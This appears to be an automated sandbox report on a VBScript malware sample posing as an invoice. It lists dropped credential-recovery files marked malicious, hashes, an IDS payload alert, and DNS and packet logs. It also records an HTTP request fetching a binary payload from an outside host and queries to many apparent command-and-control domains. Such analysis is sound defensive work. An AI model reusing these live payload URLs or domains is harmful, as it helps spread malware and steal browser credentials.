                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40
                                                                                                  Entropy (8bit):2.8420918598895937
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:VSiftlAlGQJhIl:VSVlGQPY
                                                                                                  MD5:2F245469795B865BDD1B956C23D7893D
                                                                                                  SHA1:6AD80B974D3808F5A20EA1E766C7D2F88B9E5895
                                                                                                  SHA-256:1662D01A2D47B875A34FC7A8CD92E78CB2BA7F34023C7FD2639CBB10B8D94361
                                                                                                  SHA-512:909F189846A5D2DB208A5EB2E7CB3042C0F164CAF437E2B1B6DE608C0A70E4F3510B81B85753DBEEC1E211E6A83E6EA8C96AFF896E9B6E8ED42014473A54DC4F
                                                                                                  Malicious:true
                                                                                                  Preview:....F.i.r.e.f.o.x. .R.e.c.o.v.e.r.y.....
                                                                                                  Process:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):38
                                                                                                  Entropy (8bit):2.7883088224543333
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:rFGQJhIl:RGQPY
                                                                                                  MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                                                                                                  SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                                                                                                  SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                                                                                                  SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                                                                                                  Malicious:false
                                                                                                  Preview:....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
                                                                                                  Process:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40
                                                                                                  Entropy (8bit):2.8420918598895937
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                                                                                  MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                                                                                  SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                                                                                  SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                                                                                  SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                                                                                  Malicious:true
                                                                                                  Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
                                                                                                  Process:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40
                                                                                                  Entropy (8bit):2.96096404744368
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:AJlbeGQJhIl:tGQPY
                                                                                                  MD5:BA3B6BC807D4F76794C4B81B09BB9BA5
                                                                                                  SHA1:24CB89501F0212FF3095ECC0ABA97DD563718FB1
                                                                                                  SHA-256:6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
                                                                                                  SHA-512:ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
                                                                                                  Malicious:true
                                                                                                  Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....
                                                                                                  File type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                  Entropy (8bit):4.783519118829289
                                                                                                  TrID:
                                                                                                  • Visual Basic Script (13500/0) 100.00%
                                                                                                  File name:WWVN_INVOICE_8363567453.vbs
                                                                                                  File size:233243
                                                                                                  MD5:9f8e253fd51c33a2f874942ebc0d3795
                                                                                                  SHA1:6868a9005489e56542cf0df063985132fef50f3d
                                                                                                  SHA256:c33e4e9bf305cec123840dd87aa84c6d71e68ac82ea039418e1b8be3ed791b37
                                                                                                  SHA512:eb61932008b275fde416e7e9df71b0efaec9feeb1a33af8b98d6c582fad3a9bc91cfd4450589d3fb0a7cb6601d967c8ffa5f6d023cbbf167f2eb1ac35b054b8c
                                                                                                  SSDEEP:3072:pzLcTyRQ+PUQSsYwqV0SuKiSMq+fxS9XZgrrfIhAvL18lALuDYx7Pu2nNQ:pzPRQ+Qp3ZCtG2+
                                                                                                  TLSH:C434FBC0521D19EA8298D58CBCD432AA0F5798DDFA07F96E93A05F6F1390023BD8DD5B
                                                                                                  File Content Preview:'IRIDI LLAN bedgownd Misdem rvful Huntsville chor LANDSFO Aftere Klito4 Agterin LEON stavep TROER corrective ADIPS form ..'Salonrifel9 till monorimeek Ungef7 unikae FJERNKONT NYTAARSTAL Monoxylone telfonm EVECKMI pligtigts GRIDDLEB flgeska KILLBUCK Fascio
                                                                                                  Icon Hash:e8d69ece869a9ec4
                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  192.168.11.20203.170.86.8949759802842115 05/10/22-14:22:49.687558TCP2842115ETPRO TROJAN MalDoc Requesting Payload 2020-04-214975980192.168.11.20203.170.86.89
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  May 10, 2022 14:22:49.482075930 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:49.686078072 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:49.686454058 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:49.687557936 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:49.891508102 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:49.895020962 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:49.895107031 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:49.895168066 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:49.895227909 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:49.895251036 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:49.895288944 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:49.895314932 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:49.895350933 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:49.895411968 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:49.895472050 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:49.895483971 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:49.895531893 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:49.895534039 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:49.895560980 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:49.895595074 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:49.895683050 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:49.895760059 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:49.895817041 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.099534988 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.099678040 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.099735022 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.099734068 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.099786997 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.099838018 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.099842072 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.099899054 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.099950075 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.099973917 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.100002050 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.100044966 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.100054979 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.100107908 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.100147963 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.100158930 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.100193024 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.100213051 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.100265026 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.100316048 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.100367069 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.100419044 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.100471020 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.100521088 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.100572109 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.100624084 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.100817919 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.100864887 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.100877047 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.101032019 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.304229021 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304269075 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304305077 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304327965 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304352999 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304373026 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304413080 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304425001 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.304440975 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304445028 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.304461956 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304483891 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304514885 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304536104 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304563046 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.304564953 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304585934 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304589033 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.304615021 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304635048 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304672956 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304692984 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304719925 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304738998 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304744005 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.304779053 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.304786921 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304824114 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304843903 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304869890 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.304877996 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304899931 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304919004 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304939032 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304958105 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304959059 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.304977894 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.304997921 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.305018902 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.305033922 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.305038929 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.305058956 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.305078030 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.305097103 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.305105925 CEST4975980192.168.11.20203.170.86.89
                                                                                                  May 10, 2022 14:22:50.305118084 CEST8049759203.170.86.89192.168.11.20
                                                                                                  May 10, 2022 14:22:50.305136919 CEST8049759203.170.86.89192.168.11.20
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  May 10, 2022 14:22:48.949217081 CEST5060153192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:22:49.465421915 CEST53506011.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:24:20.139080048 CEST6045553192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:24:21.103101969 CEST53604551.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:24:44.155855894 CEST5488153192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:24:44.690813065 CEST53548811.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:25:05.279268980 CEST6237153192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:25:05.320645094 CEST53623711.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:25:21.430221081 CEST5126253192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:25:21.446269989 CEST53512621.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:25:43.659826040 CEST6512953192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:25:43.782633066 CEST53651291.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:25:43.783061981 CEST6512953192.168.11.209.9.9.9
                                                                                                  May 10, 2022 14:25:44.784173965 CEST6512953192.168.11.209.9.9.9
                                                                                                  May 10, 2022 14:25:45.573015928 CEST53651299.9.9.9192.168.11.20
                                                                                                  May 10, 2022 14:25:46.538938999 CEST53651299.9.9.9192.168.11.20
                                                                                                  May 10, 2022 14:26:03.702572107 CEST5567953192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:26:03.715585947 CEST53556791.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:26:23.854129076 CEST5423053192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:26:23.995635986 CEST53542301.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:26:46.912503004 CEST5791053192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:26:47.132783890 CEST53579101.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:27:05.938769102 CEST4943953192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:27:06.129107952 CEST53494391.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:27:24.747474909 CEST6094453192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:27:25.120599985 CEST53609441.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:27:45.305309057 CEST6407753192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:27:45.499526978 CEST53640771.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:28:07.659502983 CEST5015653192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:28:08.176717997 CEST53501561.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:28:26.316116095 CEST6313853192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:28:26.363797903 CEST53631381.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:28:48.526295900 CEST5201653192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:28:48.570111036 CEST53520161.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:29:08.708797932 CEST5329453192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:29:08.849102020 CEST5329453192.168.11.209.9.9.9
                                                                                                  May 10, 2022 14:29:09.023366928 CEST53532949.9.9.9192.168.11.20
                                                                                                  May 10, 2022 14:29:09.190802097 CEST53532941.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:29:27.860749006 CEST6132153192.168.11.201.1.1.1
                                                                                                  May 10, 2022 14:29:28.001193047 CEST6132153192.168.11.209.9.9.9
                                                                                                  May 10, 2022 14:29:28.050453901 CEST53613211.1.1.1192.168.11.20
                                                                                                  May 10, 2022 14:29:28.066871881 CEST53613219.9.9.9192.168.11.20
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  May 10, 2022 14:22:48.949217081 CEST192.168.11.201.1.1.10xa48eStandard query (0)barsam.com.auA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:24:20.139080048 CEST192.168.11.201.1.1.10x28b3Standard query (0)www.dujh.xyzA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:24:44.155855894 CEST192.168.11.201.1.1.10x4d08Standard query (0)www.dujh.xyzA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:25:05.279268980 CEST192.168.11.201.1.1.10x8681Standard query (0)www.gpusforfun.comA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:25:21.430221081 CEST192.168.11.201.1.1.10x6afaStandard query (0)www.borneadomicile.comA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:25:43.659826040 CEST192.168.11.201.1.1.10xf27Standard query (0)www.liesdevocalist.storeA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:25:43.783061981 CEST192.168.11.209.9.9.90xf27Standard query (0)www.liesdevocalist.storeA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:25:44.784173965 CEST192.168.11.209.9.9.90xf27Standard query (0)www.liesdevocalist.storeA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:26:03.702572107 CEST192.168.11.201.1.1.10x151fStandard query (0)www.actu-infomail.comA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:26:23.854129076 CEST192.168.11.201.1.1.10xa070Standard query (0)www.clickleaser.comA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:26:46.912503004 CEST192.168.11.201.1.1.10x2a56Standard query (0)www.getsuzamtir.xyzA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:27:05.938769102 CEST192.168.11.201.1.1.10x156aStandard query (0)www.schnellekreditfinanz.comA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:27:24.747474909 CEST192.168.11.201.1.1.10xbf2aStandard query (0)www.repaircilinic.comA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:27:45.305309057 CEST192.168.11.201.1.1.10x846fStandard query (0)www.revboxx.comA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:28:07.659502983 CEST192.168.11.201.1.1.10xc0d0Standard query (0)www.shantelleketodietofficial.siteA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:28:26.316116095 CEST192.168.11.201.1.1.10xd472Standard query (0)www.thebeautystore.storeA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:28:48.526295900 CEST192.168.11.201.1.1.10xa0d4Standard query (0)www.projectduckling.comA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:29:08.708797932 CEST192.168.11.201.1.1.10xc7dcStandard query (0)www.linqxw.comA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:29:08.849102020 CEST192.168.11.209.9.9.90xc7dcStandard query (0)www.linqxw.comA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:29:27.860749006 CEST192.168.11.201.1.1.10xe7aeStandard query (0)www.tandelawnmaintenance.comA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:29:28.001193047 CEST192.168.11.209.9.9.90xe7aeStandard query (0)www.tandelawnmaintenance.comA (IP address)IN (0x0001)
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  May 10, 2022 14:20:59.897835016 CEST1.1.1.1192.168.11.200xe75cNo error (0)www-bing-com.dual-a-0001.a-msedge.netdual-a-0001.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                  May 10, 2022 14:20:59.897835016 CEST1.1.1.1192.168.11.200xe75cNo error (0)dual-a-0001.a-msedge.net13.107.21.200A (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:20:59.897835016 CEST1.1.1.1192.168.11.200xe75cNo error (0)dual-a-0001.a-msedge.net204.79.197.200A (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:21:00.065850973 CEST1.1.1.1192.168.11.200xc702No error (0)devcenterapi.azure-api.netapimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                  May 10, 2022 14:21:00.065850973 CEST1.1.1.1192.168.11.200xc702No error (0)devcenterapi-eastus-01.regional.azure-api.netapimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.netCNAME (Canonical name)IN (0x0001)
                                                                                                  May 10, 2022 14:21:00.702919006 CEST1.1.1.1192.168.11.200x6ac6No error (0)evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.nete-0009.e-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                  May 10, 2022 14:21:00.702919006 CEST1.1.1.1192.168.11.200x6ac6No error (0)e-0009.e-msedge.net13.107.5.88A (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:22:49.465421915 CEST1.1.1.1192.168.11.200xa48eNo error (0)barsam.com.au203.170.86.89A (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:24:21.103101969 CEST1.1.1.1192.168.11.200x28b3No error (0)www.dujh.xyz180.76.247.231A (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:24:44.690813065 CEST1.1.1.1192.168.11.200x4d08No error (0)www.dujh.xyz180.76.247.231A (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:25:05.320645094 CEST1.1.1.1192.168.11.200x8681Name error (3)www.gpusforfun.comnonenoneA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:25:21.446269989 CEST1.1.1.1192.168.11.200x6afaNo error (0)www.borneadomicile.com217.160.0.18A (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:25:43.782633066 CEST1.1.1.1192.168.11.200xf27Server failure (2)www.liesdevocalist.storenonenoneA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:25:45.573015928 CEST9.9.9.9192.168.11.200xf27Server failure (2)www.liesdevocalist.storenonenoneA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:25:46.538938999 CEST9.9.9.9192.168.11.200xf27Server failure (2)www.liesdevocalist.storenonenoneA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:26:03.715585947 CEST1.1.1.1192.168.11.200x151fName error (3)www.actu-infomail.comnonenoneA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:26:23.995635986 CEST1.1.1.1192.168.11.200xa070No error (0)www.clickleaser.com198.23.49.173A (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:26:47.132783890 CEST1.1.1.1192.168.11.200x2a56No error (0)www.getsuzamtir.xyz199.192.29.215A (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:27:06.129107952 CEST1.1.1.1192.168.11.200x156aNo error (0)www.schnellekreditfinanz.comschnellekreditfinanz.comCNAME (Canonical name)IN (0x0001)
                                                                                                  May 10, 2022 14:27:06.129107952 CEST1.1.1.1192.168.11.200x156aNo error (0)schnellekreditfinanz.com68.65.122.211A (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:27:25.120599985 CEST1.1.1.1192.168.11.200xbf2aNo error (0)www.repaircilinic.com185.53.179.171A (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:27:45.499526978 CEST1.1.1.1192.168.11.200x846fName error (3)www.revboxx.comnonenoneA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:28:08.176717997 CEST1.1.1.1192.168.11.200xc0d0Name error (3)www.shantelleketodietofficial.sitenonenoneA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:28:26.363797903 CEST1.1.1.1192.168.11.200xd472Name error (3)www.thebeautystore.storenonenoneA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:28:48.570111036 CEST1.1.1.1192.168.11.200xa0d4Name error (3)www.projectduckling.comnonenoneA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:29:09.023366928 CEST9.9.9.9192.168.11.200xc7dcNo error (0)www.linqxw.com209.99.40.222A (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:29:09.190802097 CEST1.1.1.1192.168.11.200xc7dcNo error (0)www.linqxw.com209.99.40.222A (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:29:28.050453901 CEST1.1.1.1192.168.11.200xe7aeName error (3)www.tandelawnmaintenance.comnonenoneA (IP address)IN (0x0001)
                                                                                                  May 10, 2022 14:29:28.066871881 CEST9.9.9.9192.168.11.200xe7aeName error (3)www.tandelawnmaintenance.comnonenoneA (IP address)IN (0x0001)
                                                                                                  • barsam.com.au
                                                                                                  • www.borneadomicile.com
                                                                                                  • www.clickleaser.com
                                                                                                  • www.getsuzamtir.xyz
                                                                                                  • www.schnellekreditfinanz.com
                                                                                                  • www.repaircilinic.com
                                                                                                  • www.linqxw.com
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.11.2049759203.170.86.8980C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  May 10, 2022 14:22:49.687557936 CEST9163OUTGET /bin_FCWtLoO90.bin HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Host: barsam.com.au
                                                                                                  Cache-Control: no-cache
                                                                                                  May 10, 2022 14:22:49.895020962 CEST9165INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 10 May 2022 12:22:49 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 189504
                                                                                                  Connection: keep-alive
                                                                                                  Last-Modified: Sun, 08 May 2022 23:20:05 GMT
                                                                                                  Accept-Ranges: bytes
